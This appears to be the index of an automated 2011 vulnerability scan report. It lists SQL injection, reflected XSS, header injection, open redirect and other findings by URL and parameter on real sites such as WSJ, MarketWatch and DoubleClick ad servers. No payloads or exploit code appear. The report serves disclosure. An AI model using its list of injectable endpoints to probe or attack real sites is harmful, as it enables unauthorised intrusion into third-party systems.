XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 06:57:17 CDT 2011.

1. SQL injection

1.1. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front [Referer HTTP header]

1.2. http://fanpeeps.com/ [Referer HTTP header]

1.3. http://fanpeeps.com/ [User-Agent HTTP header]

1.4. http://fanpeeps.com/ [__utma cookie]

1.5. http://fanpeeps.com/ [__utmb cookie]

1.6. http://fanpeeps.com/ [__utmb cookie]

1.7. http://fanpeeps.com/ [__utmc cookie]

1.8. http://fanpeeps.com/ [__utmc cookie]

1.9. http://fanpeeps.com/ [__utmc cookie]

1.10. http://fanpeeps.com/ [__utmz cookie]

1.11. http://fanpeeps.com/ [__utmz cookie]

1.12. http://fanpeeps.com/ [idol parameter]

1.13. http://fanpeeps.com/ [name of an arbitrarily supplied request parameter]

1.14. http://fanpeeps.com/ [pid parameter]

1.15. http://fanpeeps.com/bg2.jpg [REST URL parameter 1]

1.16. http://fanpeeps.com/bg2.jpg [__utma cookie]

1.17. http://fanpeeps.com/bg2.jpg [__utmz cookie]

1.18. http://fanpeeps.com/bg2.jpg [name of an arbitrarily supplied request parameter]

1.19. http://fanpeeps.com/function.fopen [REST URL parameter 1]

1.20. http://fanpeeps.com/function.fopen [__utma cookie]

1.21. http://fanpeeps.com/function.fopen [__utmc cookie]

1.22. http://fanpeeps.com/function.fopen [__utmz cookie]

1.23. http://fanpeeps.com/function.fopen [name of an arbitrarily supplied request parameter]

1.24. http://fanpeeps.com/greybox/AJS.js [__utma cookie]

1.25. http://fanpeeps.com/greybox/AJS.js [__utmb cookie]

1.26. http://fanpeeps.com/greybox/AJS.js [__utmc cookie]

1.27. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

1.28. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

1.29. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 1]

1.30. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 2]

1.31. http://fanpeeps.com/greybox/gb_scripts.js [Referer HTTP header]

1.32. http://fanpeeps.com/greybox/gb_scripts.js [__utma cookie]

1.33. http://fanpeeps.com/greybox/gb_scripts.js [__utmc cookie]

1.34. http://fanpeeps.com/greybox/gb_scripts.js [__utmz cookie]

1.35. http://fanpeeps.com/greybox/gb_scripts.js [name of an arbitrarily supplied request parameter]

1.36. http://fanpeeps.com/greybox/gb_styles.css [REST URL parameter 1]

1.37. http://fanpeeps.com/greybox/gb_styles.css [Referer HTTP header]

1.38. http://fanpeeps.com/greybox/gb_styles.css [User-Agent HTTP header]

1.39. http://fanpeeps.com/greybox/gb_styles.css [__utma cookie]

1.40. http://fanpeeps.com/greybox/gb_styles.css [__utmb cookie]

1.41. http://fanpeeps.com/greybox/gb_styles.css [__utmc cookie]

1.42. http://fanpeeps.com/greybox/gb_styles.css [__utmz cookie]

1.43. http://fanpeeps.com/media/ [REST URL parameter 1]

1.44. http://fanpeeps.com/media/ [REST URL parameter 1]

1.45. http://fanpeeps.com/media/ [Referer HTTP header]

1.46. http://fanpeeps.com/media/ [User-Agent HTTP header]

1.47. http://fanpeeps.com/media/ [__utma cookie]

1.48. http://fanpeeps.com/media/ [__utmc cookie]

1.49. http://fanpeeps.com/media/ [__utmz cookie]

1.50. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

1.51. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

1.52. http://fanpeeps.com/media/ [pid parameter]

1.53. http://fanpeeps.com/mlb [REST URL parameter 1]

1.54. http://fanpeeps.com/ncaa [REST URL parameter 1]

1.55. http://fanpeeps.com/ncaa2.php [REST URL parameter 1]

1.56. http://fanpeeps.com/ncaa2.php [Referer HTTP header]

1.57. http://fanpeeps.com/ncaa2.php [User-Agent HTTP header]

1.58. http://fanpeeps.com/ncaa2.php [__utma cookie]

1.59. http://fanpeeps.com/ncaa2.php [__utmz cookie]

1.60. http://fanpeeps.com/ncaa2.php [__utmz cookie]

1.61. http://fanpeeps.com/ncaa2.php [name of an arbitrarily supplied request parameter]

1.62. http://fanpeeps.com/thumbnailviewer.css [REST URL parameter 1]

1.63. http://fanpeeps.com/thumbnailviewer.css [Referer HTTP header]

1.64. http://fanpeeps.com/thumbnailviewer.css [__utma cookie]

1.65. http://fanpeeps.com/thumbnailviewer.css [__utmb cookie]

1.66. http://fanpeeps.com/thumbnailviewer.css [__utmc cookie]

1.67. http://fanpeeps.com/thumbnailviewer.css [__utmz cookie]

1.68. http://fanpeeps.com/thumbnailviewer.js [REST URL parameter 1]

1.69. http://fanpeeps.com/thumbnailviewer.js [Referer HTTP header]

1.70. http://fanpeeps.com/thumbnailviewer.js [__utma cookie]

1.71. http://fanpeeps.com/thumbnailviewer.js [__utmc cookie]

1.72. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

1.73. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

1.74. http://fanpeeps.com/twitterlib.js [REST URL parameter 1]

1.75. http://fanpeeps.com/twitterlib.js [Referer HTTP header]

1.76. http://fanpeeps.com/twitterlib.js [User-Agent HTTP header]

1.77. http://fanpeeps.com/twitterlib.js [__utma cookie]

1.78. http://fanpeeps.com/twitterlib.js [__utmc cookie]

1.79. http://fanpeeps.com/twitterlib.js [__utmz cookie]

1.80. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 3]

1.81. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 4]

1.82. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 1]

1.83. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 5]

1.84. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 1]

1.85. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

1.86. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 4]

1.87. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 5]

1.88. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252 [REST URL parameter 3]

1.89. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 [REST URL parameter 1]

1.90. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [REST URL parameter 1]

1.91. http://search.twitter.com/search.json [User-Agent HTTP header]

1.92. http://www.fanpeeps.com/ [pid parameter]

2. LDAP injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [Pos parameter]

2.2. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css [REST URL parameter 1]

2.3. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 2]

2.4. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 3]

2.5. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 4]

2.6. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

2.7. http://s.marketwatch.com/public/resources/documents/PixelTracking.html [REST URL parameter 2]

3. HTTP header injection

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

3.2. http://ad.doubleclick.net/activity [src parameter]

3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.6. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 1]

3.7. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 2]

3.8. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [!category parameter]

4.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [name of an arbitrarily supplied request parameter]

4.3. http://ad.doubleclick.net/adi/barrons.com/columnist [!category parameter]

4.4. http://ad.doubleclick.net/adi/barrons.com/public_front [!category parameter]

4.5. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]

4.6. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [!category parameter]

4.7. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [name of an arbitrarily supplied request parameter]

4.8. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front [!category parameter]

4.9. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [!category parameter]

4.10. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [name of an arbitrarily supplied request parameter]

4.11. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [!category parameter]

4.12. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [name of an arbitrarily supplied request parameter]

4.13. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

4.14. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

4.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

4.16. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [!category parameter]

4.17. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [name of an arbitrarily supplied request parameter]

4.18. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [!category parameter]

4.19. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [name of an arbitrarily supplied request parameter]

4.20. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [!category parameter]

4.21. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [name of an arbitrarily supplied request parameter]

4.22. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]

4.23. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [u parameter]

4.24. http://ad.doubleclick.net/adi/marketwatch.com/frontpage [u parameter]

4.25. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

4.26. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

4.27. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [name of an arbitrarily supplied request parameter]

4.28. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [!category parameter]

4.29. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [name of an arbitrarily supplied request parameter]

4.30. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [!category parameter]

4.31. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [name of an arbitrarily supplied request parameter]

4.32. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [u parameter]

4.33. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [!category parameter]

4.34. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [name of an arbitrarily supplied request parameter]

4.35. http://ad.doubleclick.net/adj/allthingsd.com/general [name of an arbitrarily supplied request parameter]

4.36. http://ad.doubleclick.net/adj/allthingsd.com/kara_singlepost [name of an arbitrarily supplied request parameter]

4.37. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [!category parameter]

4.38. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [name of an arbitrarily supplied request parameter]

4.39. http://ad.doubleclick.net/adj/barrons.com/survey [!category parameter]

4.40. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [!category parameter]

4.41. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [s parameter]

4.42. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [u parameter]

4.43. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [u parameter]

4.44. http://ad.doubleclick.net/adj/marketwatch.com/markets_futuremovers [p39 parameter]

4.45. http://ad.doubleclick.net/adj/marketwatch.com/mutualfunds_jaffe [p39 parameter]

4.46. http://ad.doubleclick.net/adj/marketwatch.com/personalfinance_story [p39 parameter]

4.47. http://ad.doubleclick.net/adj/smartmoney.com/intromessage [!category parameter]

4.48. http://api.bizographics.com/v1/profile.json [&callback parameter]

4.49. http://api.bizographics.com/v1/profile.json [api_key parameter]

4.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]

4.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.53. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

4.54. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

4.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

4.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

4.57. http://fanpeeps.com/ [action parameter]

4.58. http://fanpeeps.com/ [action parameter]

4.59. http://fanpeeps.com/ [idol parameter]

4.60. http://fanpeeps.com/ [idol parameter]

4.61. http://fanpeeps.com/ [iid parameter]

4.62. http://fanpeeps.com/ [iid parameter]

4.63. http://fanpeeps.com/ [pid parameter]

4.64. http://fanpeeps.com/ [pid parameter]

4.65. http://fanpeeps.com/ [pid parameter]

4.66. http://fanpeeps.com/ [q parameter]

4.67. http://fanpeeps.com/ [q parameter]

4.68. http://fanpeeps.com/ [q parameter]

4.69. http://fanpeeps.com/media/ [pid parameter]

4.70. http://fanpeeps.com/media/ [pid parameter]

4.71. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpck parameter]

4.72. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpvc parameter]

4.73. http://js.revsci.net/gateway/gw.js [csid parameter]

4.74. http://json6.ringrevenue.com/6/map_number [REST URL parameter 2]

4.75. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 1]

4.76. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 2]

4.77. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 3]

4.78. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]

4.79. http://realestate.wsj.com/item/822547 [REST URL parameter 2]

4.80. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]

4.81. http://server.iad.liveperson.net/hc/44533531/ [lpCallId parameter]

4.82. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [_ parameter]

4.83. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [callback parameter]

4.84. http://topics.wsj.com/api-video/get_video_info.asp [REST URL parameter 2]

4.85. http://www.fanpeeps.com/ [action parameter]

4.86. http://www.fanpeeps.com/ [action parameter]

4.87. http://www.fanpeeps.com/ [iid parameter]

4.88. http://www.fanpeeps.com/ [iid parameter]

4.89. http://www.fanpeeps.com/ [pid parameter]

4.90. http://www.fanpeeps.com/ [pid parameter]

4.91. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 2]

4.92. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 3]

4.93. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1]

4.94. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2]

4.95. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1]

4.96. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2]

4.97. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 1]

4.98. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 2]

4.99. http://www.marketwatch.com/news/Headline/_HeadlineItem [REST URL parameter 3]

4.100. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [REST URL parameter 1]

4.101. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [REST URL parameter 1]

4.102. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [REST URL parameter 1]

4.103. http://www.midphase.com/favicon.ico [REST URL parameter 1]

4.104. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 1]

4.105. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 2]

4.106. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 3]

4.107. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 4]

4.108. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 1]

4.109. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 2]

4.110. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 3]

4.111. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 4]

4.112. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

4.113. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

4.114. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

4.115. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

4.116. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

4.117. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

4.118. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

4.119. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

4.120. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

4.121. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

4.122. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

4.123. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_segs cookie]

4.124. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_segs cookie]

4.125. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [BIZO cookie]

4.126. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [BIZO cookie]

4.127. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_csl cookie]

4.128. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_csl cookie]

4.129. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_segs cookie]

4.130. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_segs cookie]

5. Flash cross-domain policy

5.1. http://0d7292.r.axf8.net/crossdomain.xml

5.2. http://72d329.r.axf8.net/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://altfarm.mediaplex.com/crossdomain.xml

5.5. http://amch.questionmarket.com/crossdomain.xml

5.6. http://api.dimestore.com/crossdomain.xml

5.7. http://b.scorecardresearch.com/crossdomain.xml

5.8. http://bh.contextweb.com/crossdomain.xml

5.9. http://bp.specificclick.net/crossdomain.xml

5.10. http://bs.serving-sys.com/crossdomain.xml

5.11. http://cache-01.cleanprint.net/crossdomain.xml

5.12. http://cdn.eyewonder.com/crossdomain.xml

5.13. http://dowjones.tt.omtrdc.net/crossdomain.xml

5.14. http://ds.serving-sys.com/crossdomain.xml

5.15. http://fls.doubleclick.net/crossdomain.xml

5.16. http://ib.adnxs.com/crossdomain.xml

5.17. http://img.mediaplex.com/crossdomain.xml

5.18. http://js.revsci.net/crossdomain.xml

5.19. http://log30.doubleverify.com/crossdomain.xml

5.20. http://metrics.apple.com/crossdomain.xml

5.21. http://mp.apmebf.com/crossdomain.xml

5.22. http://om.dowjoneson.com/crossdomain.xml

5.23. http://pix04.revsci.net/crossdomain.xml

5.24. http://pixel.quantserve.com/crossdomain.xml

5.25. http://puma.vizu.com/crossdomain.xml

5.26. http://search.twitter.com/crossdomain.xml

5.27. http://secure-us.imrworldwide.com/crossdomain.xml

5.28. http://static.2mdn.net/crossdomain.xml

5.29. http://t.mookie1.com/crossdomain.xml

5.30. http://ad.wsod.com/crossdomain.xml

5.31. http://allthingsd.com/crossdomain.xml

5.32. http://disqus.com/crossdomain.xml

5.33. http://edge.sharethis.com/crossdomain.xml

5.34. http://googleads.g.doubleclick.net/crossdomain.xml

5.35. http://i1.marketwatch.com/crossdomain.xml

5.36. http://i3.marketwatch.com/crossdomain.xml

5.37. http://i4.marketwatch.com/crossdomain.xml

5.38. http://images.apple.com/crossdomain.xml

5.39. http://images.scanalert.com/crossdomain.xml

5.40. http://itunes.apple.com/crossdomain.xml

5.41. http://kara.allthingsd.com/crossdomain.xml

5.42. http://online.barrons.com/crossdomain.xml

5.43. http://online.wsj.com/crossdomain.xml

5.44. http://p.opt.fimserve.com/crossdomain.xml

5.45. http://pubads.g.doubleclick.net/crossdomain.xml

5.46. http://r.mzstatic.com/crossdomain.xml

5.47. http://s.marketwatch.com/crossdomain.xml

5.48. http://server.iad.liveperson.net/crossdomain.xml

5.49. http://static.ak.fbcdn.net/crossdomain.xml

5.50. http://topics.barrons.com/crossdomain.xml

5.51. http://topics.wsj.com/crossdomain.xml

5.52. http://www.facebook.com/crossdomain.xml

5.53. http://www.marketwatch.com/crossdomain.xml

5.54. http://www.mcafeesecure.com/crossdomain.xml

5.55. https://www.mcafeesecure.com/crossdomain.xml

5.56. http://www.smartmoney.com/crossdomain.xml

5.57. http://api.twitter.com/crossdomain.xml

5.58. http://bit.ly/crossdomain.xml

5.59. http://stats.wordpress.com/crossdomain.xml

5.60. http://twitter.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://cdn.eyewonder.com/clientaccesspolicy.xml

6.4. http://metrics.apple.com/clientaccesspolicy.xml

6.5. http://om.dowjoneson.com/clientaccesspolicy.xml

6.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

6.7. http://static.2mdn.net/clientaccesspolicy.xml

6.8. http://stats.wordpress.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://commerce.wsj.com/auth/login

7.2. http://commerce.wsj.com/auth/login

7.3. http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html

7.4. http://online.barrons.com/article/barrons_take.html

7.5. http://online.barrons.com/home-page

7.6. http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html

7.7. http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html

7.8. http://online.wsj.com/article/SB10001424052748703730804576317293981683266.html

7.9. http://online.wsj.com/article/SB10001424052748703730804576317293981683266.html

7.10. http://online.wsj.com/article/SB10001424052748703864204576314083707711492--LESS.html

7.11. http://online.wsj.com/article/SB10001424052748703864204576314083707711492--LESS.html

7.12. http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html

7.13. http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html

7.14. http://online.wsj.com/article/SB10001424052748704681904576315662838806984.html

7.15. http://online.wsj.com/article/SB10001424052748704681904576315662838806984.html

7.16. http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html

7.17. http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html

7.18. http://online.wsj.com/home-page

7.19. http://online.wsj.com/home-page

7.20. http://online.wsj.com/public/page/news-career-jobs.html

7.21. http://online.wsj.com/public/page/news-economy.html

7.22. http://online.wsj.com/public/page/news-real-estate-homes.html

7.23. http://realestate.wsj.com/for-sale/us/10010

7.24. http://realestate.wsj.com/for-sale/us/10010

7.25. http://realestate.wsj.com/item/822547

7.26. http://realestate.wsj.com/item/822547

7.27. http://topics.barrons.com/person/S/michael-santoli/6041

7.28. http://topics.wsj.com/djscript/latest/dj/widget/panels/view/SlidePanel.js

7.29. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

7.30. http://www.fins.com/

7.31. http://www.fins.com/Job-Interview-Tips

7.32. http://www.fins.com/Tour.aspx

7.33. http://www.smartmoney.com/

7.34. http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/

8. XML injection

8.1. http://api.dimestore.com/viapi [action parameter]

8.2. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.4. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 1]

8.5. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 2]

8.6. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 3]

8.7. http://use.typekit.com/k/uhh2the-e.css [REST URL parameter 1]

8.8. http://use.typekit.com/k/uhh2the-e.css [REST URL parameter 2]

9. SQL statement in request parameter

10. SSL cookie without secure flag set

10.1. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

10.2. https://home.mcafee.com/secure/cart/

10.3. https://order.wsj.com/sub/f3

10.4. https://order.wsj.com/sub/f3/cookie_check

10.5. https://order.wsj.com/sub/f3/offer_form

10.6. https://order.wsj.com/sub/xdef/101/6BCWAE_OOT10

10.7. https://order.wsj.com/sub/xdef/113/6BFWA1_OOT

10.8. https://services.wsj.com/Gryphon/jsp/find_acct.jsp

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

11.3. http://fls.doubleclick.net/activityi

11.4. http://l.sharethis.com/pview

11.5. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

11.6. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

11.7. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

11.8. http://server.iad.liveperson.net/hc/10599399/

11.9. http://server.iad.liveperson.net/hc/44533531/

11.10. http://www.facebook.com/extern/login_status.php

11.11. http://www.google.com/realtimejs

11.12. http://www.mcafeesecure.com/us/

11.13. http://www.mcafeesecure.com/us/products/buy_now.jsp

11.14. http://www.mcafeesecure.com/us/products/mcafee_secure.jsp

11.15. https://www.mcafeesecure.com/SignUp.sa

11.16. https://www.mcafeesecure.com/us/products/buy_now.jsp

11.17. https://www.mcafeesecure.com/us/resources/resource.jsp

11.18. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php

12. SSL certificate

12.1. https://www.mcafeesecure.com/

12.2. https://commerce.wsj.com/

12.3. https://order.wsj.com/

12.4. https://services.wsj.com/

13. Open redirection

13.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [rtu parameter]

13.2. http://idolpeeps.com/ [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://allthingsd-kara.disqus.com/remote_auth.js

14.2. http://allthingsd-kara.disqus.com/thread.js

14.3. http://api.twitter.com/1/statuses/user_timeline.json

14.4. http://api.twitter.com/1/urls/resolve.json

14.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

14.6. https://home.mcafee.com/secure/cart/

14.7. http://online.wsj.com/home-page

14.8. http://t.mookie1.com/t/v1/imp

14.9. http://t.mookie1.com/t/v1/imp/cc

14.10. http://us.mcafee.com/root/basket.asp

14.11. http://us.mcafee.com/root/offer.asp

14.12. http://ad.doubleclick.net/activity

14.13. http://ad.doubleclick.net/activity

14.14. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

14.15. http://ads.revsci.net/adserver/ako

14.16. http://ads.revsci.net/adserver/ako

14.17. http://ads.revsci.net/adserver/ako

14.18. http://altfarm.mediaplex.com/ad/js/13754-86576-1281-0

14.19. http://altfarm.mediaplex.com/ad/js/13754-86576-29158-0

14.20. http://amch.questionmarket.com/adsc/d845473/10/40348193/decide.php

14.21. http://api.bizographics.com/v1/profile.json

14.22. http://b.scorecardresearch.com/b

14.23. http://b.scorecardresearch.com/r

14.24. http://bh.contextweb.com/bh/set.aspx

14.25. http://bp.specificclick.net/

14.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.27. http://c.statcounter.com/t.php

14.28. http://fls.doubleclick.net/activityi

14.29. http://fls.doubleclick.net/activityi

14.30. http://ib.adnxs.com/seg

14.31. http://id.google.com/verify/EAAAACuGG1ZJOl73NLOdE3G8DE0.gif

14.32. http://images.apple.com/global/nav/styles/navigation.css

14.33. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

14.34. http://js.revsci.net/common/pcx.js

14.35. http://l.sharethis.com/pview

14.36. http://leadback.advertising.com/adcedge/lb

14.37. http://m.adnxs.com/msftcookiehandler

14.38. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252

14.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s81213273680768

14.40. http://mp.apmebf.com/ad/js/13754-86576-1281-0

14.41. http://odb.outbrain.com/utils/get

14.42. http://odb.outbrain.com/utils/get

14.43. http://odb.outbrain.com/utils/get

14.44. http://odb.outbrain.com/utils/get

14.45. http://odb.outbrain.com/utils/ping.html

14.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s77142258654348

14.47. http://online.barrons.com/home

14.48. http://p.opt.fimserve.com/bht/

